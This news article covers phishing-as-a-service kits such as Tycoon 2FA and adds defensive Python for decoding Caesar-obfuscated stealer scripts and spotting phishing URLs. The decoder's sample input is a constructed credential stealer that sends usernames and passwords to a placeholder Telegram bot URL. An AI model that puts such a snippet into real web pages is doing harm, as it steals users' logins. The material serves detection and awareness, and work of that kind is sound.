Cybercriminals upgrade Tycoon 2FA phishing kit as PhaaS attacks surge


Cybercriminals stepped up phishing-as-a-service (PhaaS) activity in the first months of this year, making their attacks more complex and more evasive.

In January and February, Barracuda Networks says it observed a million PhaaS attacks built on the three most widely used PhaaS kits: Tycoon 2FA, EvilProxy, and Sneaky 2FA.

February saw a spike in attacks using Tycoon 2FA, which accounted for 89% of all the PhaaS attacks observed.


Earlier versions of Tycoon 2FA used malicious scripts to obstruct defenders' analysis of its phishing pages, for example by blocking keyboard shortcuts. The kit's developers have now abandoned that approach and replaced it with a more evasive one.

The script that steals the victim's credentials and exfiltrates them to an attacker-controlled server is now obfuscated with a Caesar cipher (every letter shifted by a fixed amount) rather than stored in plaintext. That defeats a naive keyword scan of the page source, but it is trivial to undo: there are only 25 possible shifts to try.
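Because a Caesar cipher has only 25 non-trivial shifts, a defender can brute-force it and score each candidate for JavaScript keywords, then pull out the tells mentioned below (browser fingerprinting, Telegram links). The following is an added example written for this article, not Tycoon 2FA's code or Barracuda's tooling; the sample script, the shift value of 7, and the marker list are all constructed assumptions.

```python
import re
import string

LOWER, UPPER = string.ascii_lowercase, string.ascii_uppercase


def caesar_shift(text: str, shift: int) -> str:
    """Rotate ASCII letters by `shift` positions (mod 26); digits, punctuation and
    whitespace pass through unchanged, as in a classic Caesar cipher."""
    out = []
    for ch in text:
        if ch in LOWER:
            out.append(LOWER[(LOWER.index(ch) + shift) % 26])
        elif ch in UPPER:
            out.append(UPPER[(UPPER.index(ch) + shift) % 26])
        else:
            out.append(ch)
    return "".join(out)


# Tokens a readable JavaScript credential stealer is very likely to contain (assumed list).
JS_MARKERS = ("function", "navigator", "document", "window", "fetch",
              "return", "https", "var ", "const ")


def js_score(text: str) -> int:
    """Heuristic: how many JavaScript marker tokens appear in the candidate plaintext."""
    return sum(text.count(marker) for marker in JS_MARKERS)


def recover_script(ciphertext: str):
    """Try all 26 shifts; return (shift, plaintext) for the one that reads most like JavaScript."""
    best_shift = max(range(26), key=lambda k: js_score(caesar_shift(ciphertext, -k)))
    return best_shift, caesar_shift(ciphertext, -best_shift)


TELEGRAM_RE = re.compile(r"""https?://[^\s"']*telegram[^\s"']*""")


def extract_indicators(script: str) -> dict:
    """Pull out the two tells described in the article: Telegram URLs and browser fingerprinting."""
    return {
        "telegram_urls": TELEGRAM_RE.findall(script),
        "fingerprints_browser": ("navigator.userAgent" in script
                                 or "navigator.platform" in script),
    }


# Constructed sample: a minimal stealer in the style the article describes,
# then Caesar-shifted by 7. The shift is an assumption; the article does not
# state which shift the kit uses.
SAMPLE_SCRIPT = """\
var ua = navigator.userAgent;
var bot = "https://api.telegram.org/botTOKEN/sendMessage";
function send(user, pass) {
  var msg = "UA=" + ua + " user=" + user + " pass=" + pass;
  fetch(bot + "?chat_id=CHAT&text=" + encodeURIComponent(msg));
}
"""
CIPHERTEXT = caesar_shift(SAMPLE_SCRIPT, 7)

if __name__ == "__main__":
    shift, plaintext = recover_script(CIPHERTEXT)
    print("recovered shift:", shift)
    print(plaintext)
    print(extract_indicators(plaintext))
```

Keyword scoring is a heuristic: it works here because a working stealer cannot avoid names like `navigator` or `fetch`, but a kit that layers another encoding on top of the shift (for instance Base64 or string splitting) needs that layer removed first.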

“The upgraded script identifies a victim’s browser type, likely for evasion or attack customization. It also includes Telegram links, which are often used to secretly send stolen data to attackers,” Barracuda Networks claims in a blog post.

One indicator of a Tycoon 2FA attack is a phishing domain under the “.ru” top-level domain (the last label of the hostname), with the victim’s email address embedded in the phishing URL, either in plaintext or Base64-encoded.

EvilProxy, another kit that requires only minimal technical knowledge to operate, was used in 8% of the attacks.


Through phishing emails and malicious links, EvilProxy tricks victims into entering their credentials on seemingly legitimate login pages, targeting Microsoft 365, Google, and other cloud-based platforms.

EvilProxy attacks are harder to detect because they use randomized URLs rather than a fixed address that can simply be blocklisted. Users should be mindful of this and avoid entering their credentials if the Microsoft or Google login page URL differs from the one they usually see.


The third most popular PhaaS kit, Sneaky 2FA, which targets Microsoft 365 accounts for credentials and access, was used in 3% of all PhaaS attacks spotted by Barracuda Networks.

According to Barracuda Networks, a sign of Sneaky 2FA is that its phishing URLs usually contain a 150-character alphanumeric string followed by one of the paths /index, /verify, or /validate.
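The URL indicators given for Tycoon 2FA (a “.ru” domain plus the victim's email address in the URL, plain or Base64-encoded) and for Sneaky 2FA (a 150-character alphanumeric segment followed by /index, /verify or /validate) can be turned into a small triage check for URLs pulled from mail logs or proxy logs. This is an added example written for this article, not Barracuda's detection logic; the sample URLs are constructed, and treating the 150-character string as the first path segment is an assumption.

```python
import base64
import random
import re
import string
from urllib.parse import unquote, urlparse

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Runs of base64 / base64url alphabet long enough to hold an e-mail address,
# with optional trailing padding.
B64_RE = re.compile(r"[A-Za-z0-9+/_-]{16,}={0,2}")
# Sneaky 2FA pattern from the article. Anchoring it to the first path segment
# is an assumption made here.
SNEAKY_RE = re.compile(r"^/[A-Za-z0-9]{150}/(index|verify|validate)(/|$)")


def _b64_to_text(token: str) -> str:
    """Decode a base64 or base64url token leniently; return '' if it is not decodable."""
    token = token.replace("-", "+").replace("_", "/")
    token += "=" * (-len(token) % 4)          # restore stripped padding
    try:
        return base64.b64decode(token).decode("utf-8", "ignore")
    except ValueError:                        # binascii.Error is a ValueError
        return ""


def find_embedded_email(url: str):
    """Return an e-mail address carried in the URL, plain or Base64-encoded, else None."""
    decoded = unquote(url)                    # alice%40example.com -> alice@example.com
    m = EMAIL_RE.search(decoded)
    if m:
        return m.group(0)
    parts = urlparse(decoded)
    for token in B64_RE.findall(parts.path + "?" + parts.query + "#" + parts.fragment):
        m = EMAIL_RE.search(_b64_to_text(token))
        if m:
            return m.group(0)
    return None


def classify_url(url: str) -> dict:
    """Match a URL against the Tycoon 2FA and Sneaky 2FA indicators described in the article."""
    parts = urlparse(url)
    host = parts.hostname or ""               # urlparse lower-cases the hostname
    indicators = []
    email = find_embedded_email(url)
    if host.endswith(".ru"):
        indicators.append("ru-tld")
    if email:
        indicators.append("email-in-url")
    if SNEAKY_RE.match(parts.path):
        indicators.append("150-char-path")
    kit = None
    if "ru-tld" in indicators and "email-in-url" in indicators:
        kit = "Tycoon 2FA"
    elif "150-char-path" in indicators:
        kit = "Sneaky 2FA"
    return {"kit": kit, "indicators": indicators, "email": email}


# Constructed sample URLs (not real phishing infrastructure).
_SEG = "".join(random.Random(1).choices(string.ascii_letters + string.digits, k=150))
SAMPLES = {
    "tycoon_b64": "https://login-check.example.ru/auth/?e="
                  + base64.b64encode(b"alice@example.com").decode(),
    "tycoon_plain": "https://login-check.example.ru/auth/alice%40example.com",
    "sneaky": "https://example.net/" + _SEG + "/index",
    "benign": "https://login.microsoftonline.com/common/oauth2/v2.0/authorize",
}

if __name__ == "__main__":
    for name, url in SAMPLES.items():
        print(name, classify_url(url))
```

A “.ru” domain on its own is not evidence of anything, which is why the check only names Tycoon 2FA when the email address is also present; the individual indicators are returned separately so they can be weighted differently in a real pipeline.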